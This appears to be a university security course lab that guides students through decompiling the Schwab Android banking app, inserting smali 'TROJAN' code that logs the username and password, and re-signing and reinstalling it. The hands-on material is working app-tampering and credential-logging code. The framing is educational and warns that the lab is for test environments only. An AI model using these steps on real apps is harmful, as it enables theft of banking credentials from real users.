Project 10: Adding Trojan Code to the Schwab Android App (20 pts.)

Don't Be Evil This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments! Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project

• A computer with any OS, with the JDK installed. If you've installed Android Studio, JDK should be installed already. If you want to install JDK alone, instructions are here.
• An Android emulator such as Genymotion, or a real Android device, to test the app on

Purpose

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Installing a Real App on the Emulated Phone

Responsible Disclosure

OWASP classified this vulnerability as #10 of the Top Ten Mobile Risks in 2011, but the new 2016 list raised it to #8.

Troubleshooting If Schwab ever fixes this (unlikely), you can get the app version I used here: https://samsclass.info/128/proj/com.schwab.mobile-1.apk

Finding ADB

Execute these commands, changing the path in the first command to your correct SDK path.

Note: To find your SDK path, open Android Studio and click Tools, Android, "SDK Manager".

Here are common examples of SDK paths:

• Ubuntu: /home/user/Android/Sdk
• Mac: ~/Library/Android/sdk
• Windows: C:\Users\student\AppData\Local\Android\sdk

NOTE: If you are using Windows, remove the "./" before "adb".

cd /Users/sambowne/Library/Android/sdk

cd platform-tools

./adb devices -l

You should see a device listed, as shown below.

Troubleshooting If the Genymotion device is not visible to adb, try these troubleshooting steps. Make sure the Genymotion device is running and connected to the Internet. Open the Web browser and see if you can view Web pages. Try issuing these commands: ./adb kill-server ./adb start-server Find the devices IP adress in Settings, Wi-Fi and connect to it with this command, replacing the IP address with the correct address in Genymotion ./adb connect 192.168.1.101

Pulling the APK File from the Android Emulator

Note: If you are using Windows, omit the "./" before adb, and replace "grep" with "findstr".

./adb shell pm list packages | grep wab

./adb shell pm path com.schwab.mobile

./adb pull /data/app/com.schwab.mobile-1.apk

Move the APK file to some convenient directory to work in, such as Downloads.

Disassembling an APK with apktool

Otherwise, go to

https://connortumbleson.com/2017/01/23/apktool-v2-2-2-released/

Download the latest version. When I did it on 2-22-16, it was "apktool_2.2.2.jar".

Warning: version 2.0.3 does NOT work--the app decompiles but cannot rebuild.

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the location you placed the downloaded file and open it with java, as shown below.

cd Downloads

java -jar apktool_2.2.2.jar d com.schwab.mobile-1.apk

Exploring the Smali Code

When I decompiled the app version from May, 2015, Schwab didn't use ProGuard, so all the names were readable, as shown below.

Finding Interesting Code with Grep

Execute these commands:

cd com.schwab.mobile-1

grep -r Password smali

One place it's found is in the smali/com/schwab/mobile/domainmodel/f/b/i.smali file, as shown below.

Saving a Screen Image

Capture a full-screen image.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.

Other Useful Search Terms

I usually search with "grep -ir" to be case insensitive and recursive.

• password, pass
• userid, user
• login, signin
• KeyDown, key, afterTextChanged
• user-agent, useragent
• post
• http, https

Viewing Smali Code

Navigate to the smali/com/schwab/mobile/domainmodel/f/b/i.smali file and open it in a text editor.

At the start of the file, two fields are defined: a contains the username and b contains the password, as shown below.

Scroll down to find the "public constructor" method, as shown below.

line 27 puts the username in the p1 parameter, and line 28 puts the password in the p2 parameter.

To demonstrate the vulnerability, we'll put the username and password into the Android log. That is a famously insecure place to put them, because any app on the device can see them.

To do that, we need to make three changes in the file.

1. Reserving a Local Variable

I recommend adding a comment line (beginning with #) before the change, so you can find it and reverse it if you make an error.

Make this change in the file, as shown below.

2. Putting the Username in the Log

# TROJAN
const-string v0, "TROJAN STEALING USERNAME:" 
invoke-static {v0, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
# END OF TROJAN

3. Putting the Password in the Log

# TROJAN
const-string v0, "TROJAN STEALING PASSWORD:" 
invoke-static {v0, p2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
# END OF TROJAN

Save the modified file.

Rebuilding the App

The easiest way to do that is to start from the decompiled app's home directory, which is where you left off after performing the "grep" command.

In a Terminal or Command Prompt, execute this command:

java -jar ../apktool_2.2.2.jar b .

Making a Self-Signed Certificate

keytool

Troubleshooting If you see "keysigner not found", you are probably using Windows. The Java installer does not work and you need to set two environment variables manually. Click Start, Computer. Navigate to C:\Program Files\java and find out the full path to your jdk folder. It will be something like C:\Program Files\Java\jdk1.7.0_75 Now execute this command at an Administrator command prompt, with the correct jdk version: set JAVA_HOME="C:\Program Files\Java\jdk1.7.0_75" You also need to add this path to the PATH environment variable. To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables". Ensure that PATH is selected, and click Edit.... At the end of the path, insert this line, with the correct jdk version: ;C:\Program Files\Java\jdk1.7.0_75\bin Then log out and log in again.

To make your certificate, execute this command, replacing "YOURNAME" with a version of your own name that does not include any spaces:

keytool -genkey -keyalg RSA -alias selfsigned -keystore YOURNAME-keystore.jks -storepass password -validity 360 -keysize 2048

This creates a self-signed certificate with a password of "password" that's valid for 360 days.

Re-Signing the APK

To do that, we'll use the "jarsigner" tool, part of the Jave Development Kit.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" match the location of your signing certificate.

I recommend that you copy your signing certificate to the Downloads folder to make this easier.

The last parameter is your key's Alias.

Execute this command:

jarsigner -keystore YOURNAME-keystore.jks dist/* selfsigned

Uninstalling the Original App

Tap the circle at the bottom center.

Tap Settings.

Tap Apps.

Tap Schwab.

Tap Uninstall.

Tap OK.

Installing the Modified App

The modified app installs and launches, as shown below.

Monitoring the Log

./adb logcat

./adb logcat | grep TROJAN

Entering Data into the Trojaned App

In the next screen, at the top right, click "Log In".

Enter fake credentials, using your name as the login name, as shown below. Click "Log in".

Viewing the Stolen Data

Saving a Screen Image

Capture a full-screen image.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.

Turning in your Project

Sources

Dancing with dalvik

ExploitMe Mobile Android Labs